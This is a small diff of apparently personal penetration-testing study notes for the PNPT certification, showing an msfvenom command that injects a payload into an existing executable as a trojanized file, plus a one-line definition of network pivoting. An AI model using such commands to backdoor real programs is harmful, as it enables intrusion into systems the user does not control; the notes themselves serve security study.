ConnorDedic/notes/PNPT/Tradecraft.md

 msfvenom -a <arch> --platform <os> -x <name>.<ext> -k -p windows/messagebox lhost=<ip> -b "\x00" -f exe -o <final_name>.<ext>
 ```
 ## Pivoting
+*Utilizing multiple hosts to cross network boundaries you would not usually have access to.
+This is more of a targeted objective.*

 SSH proxy through a compromised machine
 ```